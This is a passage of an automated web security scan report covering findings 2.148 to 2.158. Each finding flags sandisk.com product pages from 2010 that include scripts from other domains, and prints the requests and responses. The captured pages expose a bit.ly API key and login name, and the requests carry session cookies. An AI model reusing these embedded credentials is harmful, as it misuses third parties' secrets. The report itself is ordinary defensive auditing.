Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12579
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.148. http://www.sandisk.com/products/camcorder/sandisk-extreme-hd-video-sdhc-cards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/camcorder/sandisk-extreme-hd-video-sdhc-cards

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/camcorder/sandisk-extreme-hd-video-sdhc-cards HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31382
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk Extreme.. HD Video SDHC... 16GB Card
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRX3-016G-A21&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">SanDisk Extreme.. HD Video SDHC... 8GB Card
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRX3-8192-A21&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">SanDisk Extreme.. HD Video SDHC... 4GB Card
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRX3-4096-A21&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.149. http://www.sandisk.com/products/camcorder/sandisk-video-hd-sdhc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/camcorder/sandisk-video-hd-sdhc

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/camcorder/sandisk-video-hd-sdhc HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30500
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">Capture the whole story in top quality video on the highest capacity 16GB SanDisk.. Video HD... card, the ultimate memory card optimized for video.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDHV-016G-A15&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Keep shooting all of your important moments with the 8GB SanDisk.. Video HD... memory card, the ultimate memory card optimized for video.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDHV-008G-A15&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Capture those important moments with the ultimate memory card optimized for video, the 4GB SanDisk.. Video HD... card.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDHV-004G-A15&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.150. http://www.sandisk.com/products/computing-products/sandisk-cruzer-blade-usb-flash-drive  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/computing-products/sandisk-cruzer-blade-usb-flash-drive

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/computing-products/sandisk-cruzer-blade-usb-flash-drive HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30801
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk.. Cruzer.. Blade... USB flash drive 16GB
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ50-016G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">SanDisk.. Cruzer.. Blade... USB flash drive 8GB
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ50-008G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">SanDisk.. Cruzer.. Blade... USB flash drive 4GB
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ50-004G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">SanDisk.. Cruzer.. Blade... USB flash drive 2GB
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ50-002G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.151. http://www.sandisk.com/products/computing-products/sandisk-solid-state-drive  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/computing-products/sandisk-solid-state-drive

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/computing-products/sandisk-solid-state-drive HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 52812
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">Twice the capacity with the same reliability, durability and performance for your laptop or PC.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDS7CB-120G-G25&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Upgrade your laptop to better performance: With SanDisk.. SSD, you...ll enjoy faster boot-ups and open files in up to half the time compared to a 7200 hard drivei.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDS7CB-060G-G25&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.152. http://www.sandisk.com/products/computing-products/sandisk-ultra-backup-usb-flash-drive  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/computing-products/sandisk-ultra-backup-usb-flash-drive

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/computing-products/sandisk-ultra-backup-usb-flash-drive HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53783
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
s or have many important digital files, be sure to back them up with SanDisk Ultra.. Backup USB Flash Drive 64GB*. Protect your files with password protection and AES hardware encryption too.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ40-064G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">This button...s got your back; from first meeting to final presentation, you can be sure your business files, photos and videos are backed up ... at the touch of a button!
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ40-032G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
family memories are important to you, make sure you back them up. Now with SanDisk Ultra.. Backup USB Flash Drive 16GB*, simply back up your family photos and videos at the touch of a button!
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ40-016G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Also functioning as a regular USB flash drive, this one has added functionality: Simple backup at the touch of a button! No cables or software installation needed.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ40-008G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.153. http://www.sandisk.com/products/dslr/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/dslr/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/dslr/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51591
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.154. http://www.sandisk.com/products/dslr/sandisk-extreme-compactflash-card  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/dslr/sandisk-extreme-compactflash-card

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/dslr/sandisk-extreme-compactflash-card HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33022
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
in the glaciers of Antarctica or in the Saharan desert, you...ll capture exactly the shots you want with cards tested to perform under pressure, inside and out, even in extreme environments.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFX-032G-A61&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Get the speed you need and take all your shots to the extreme...with the card made to capture all the action, all the time.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFX-016G-A61&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Start shooting like a pro and bring your best shots and high-def video to life.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFX-008G-A61&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.155. http://www.sandisk.com/products/dslr/sandisk-extreme-iv-compactflash  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/dslr/sandisk-extreme-iv-compactflash

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/dslr/sandisk-extreme-iv-compactflash HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31820
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">From Madagascar to Moscow. Wherever your next assignment takes you, a 16GB card gives you the room you need to keep up as the shots keep coming.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFX4-016G-901&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Sometimes the perfect shot is the last one of the day. You...ll never come up short at the end of a long photo shoot when you...re armed with 8GB of capacity.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFX4-8192-901&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
class="two">Because someone has to shoot the cover shot. When the perfect shot comes, you...ll be ready. With 4GB of space, you...ll never come up short when that career-making moment strikes.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFX4-4096-901&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.156. http://www.sandisk.com/products/dslr/sandisk-extreme-pro-compactflash-card  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/dslr/sandisk-extreme-pro-compactflash-card

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/dslr/sandisk-extreme-pro-compactflash-card HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33551
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
the power of the card worthy of your camera. Stress-tested for extreme shock, vibration, temperature and humidity, you can take your extended shots and video to the extreme...no matter what.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFXP-064G-A91&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Built to keep up with your most demanding shoots...and non-stop bursts of creative vision...you...ll never miss a sequence or compromise even one shot.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFXP-032G-A91&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Capture the exact shot that moves you with the memory card fast enough to keep up with your advanced DSLR.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFXP-016G-A91&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.157. http://www.sandisk.com/products/dslr/sandisk-extreme-pro-compactflash-card.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/dslr/sandisk-extreme-pro-compactflash-card.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/dslr/sandisk-extreme-pro-compactflash-card.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33561
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
the power of the card worthy of your camera. Stress-tested for extreme shock, vibration, temperature and humidity, you can take your extended shots and video to the extreme...no matter what.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFXP-064G-A91&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Built to keep up with your most demanding shoots...and non-stop bursts of creative vision...you...ll never miss a sequence or compromise even one shot.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFXP-032G-A91&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Capture the exact shot that moves you with the memory card fast enough to keep up with your advanced DSLR.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFXP-016G-A91&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.158. http://www.sandisk.com/products/dslr/sandisk-extreme-sdhc-cards-  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/dslr/sandisk-extreme-sdhc-cards-

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/dslr/sandisk-extreme-sdhc-cards- HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33196
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
